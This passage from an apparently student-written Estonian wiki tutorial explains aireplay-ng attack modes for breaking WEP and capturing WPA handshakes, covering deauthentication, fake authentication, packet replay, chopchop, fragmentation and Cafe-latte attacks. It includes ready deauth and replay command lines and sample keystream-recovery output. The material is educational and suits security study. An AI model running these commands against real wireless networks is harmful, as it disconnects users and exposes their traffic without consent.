NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32782</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32782"/>
		<updated>2011-05-24T18:35:31Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Suunatud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0 -c CC:CC:CC:CC:CC:CC --ignore-negative-one&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
